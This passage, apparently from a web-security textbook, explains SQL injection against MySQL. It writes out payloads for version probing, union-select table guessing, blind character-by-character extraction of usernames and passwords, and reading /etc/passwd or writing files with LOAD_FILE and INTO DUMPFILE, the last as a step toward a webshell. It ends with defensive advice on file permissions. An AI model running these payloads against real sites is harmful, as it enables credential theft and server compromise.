Through SQL injection, the attacker can guess the corresponding version of the database. For example, in the following payload, if the MySQL version is 4, then it returns TRUE:
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4
The following payload uses union select to confirm if the admin exists as a table name and if the password exists as a column name:
id=5 union all select 1,2,3 from admin
id=5 union all select 1,2,passwd from admin
In addition, if you want to guess the value of the username and password, you can read them out step-by-step based on the range of characters:
id=5 and ascii(substring((select concat(username,0x3a,passwd) from users limit 0,1),1,1))>64 /*ret true)*/
id=5 and ascii(substring((select concat(username,0x3a,passwd) from users limit 0,1),1,1))>96 /*ret true*/
id=5 and ascii(substring((select concat(username,0x3a,passwd) from users limit 0,1),1,1))>100 /*ret false*/
id=5 and ascii(substring((select concat(username,0x3a,passwd) from users limit 0,1),1,1))>97 /*ret false*/ ...
id=5 and ascii(substring((select concat(username,0x3a,passwd) from users limit 0,1),2,1))>64 /*ret true*/ ...
This process is very cumbersome, so it is very necessary to use an automated tool to complete the whole process. sqlmap.py* is a very good automated injection tool.
In the process of injection attacks, skills of reading and writing files are often used. For example, at MySQL, by using LOAD_FILE (), we can read the system files, and by using INTO DUMPFILE, we can write a local file. Of course, it is required that the current database users have permission to read and write the corresponding file or directory.
… union select 1,1, LOAD_FILE('/etc/passwd'),1,1;
If you want to read the file and return the result to the attacker, you can use the following techniques:
CREATE TABLE potatoes(line BLOB);
UNION SELECT 1,1, HEX(LOAD_FILE('/etc/passwd')),1,1 INTO DUMPFILE '/tmp/potatoes';
LOAD DATA INFILE '/tmp/potatoes' INTO TABLE potatoes;
It is required that the current database user has permission to create tables. First LOAD_ FILE () can read system files; then, INTO DUMPFILE can write files into the system; then, LOAD DATA INFILE can import the files into tables; and finally, with general injection skills, one can directly manipulate table data.
Besides INTO OUTFILE, INTO DUMPFILE also has the same effect. The difference is that DUMPFILE is applied to binary files, so the target file will be written to the same line; OUTFILE is more applicable to text files.
Write file techniques are often used to export a Webshell to pave the way for further attacks. Therefore, when designing the database security solutions, ordinary database users should be prohibited from having permission to manipulate files.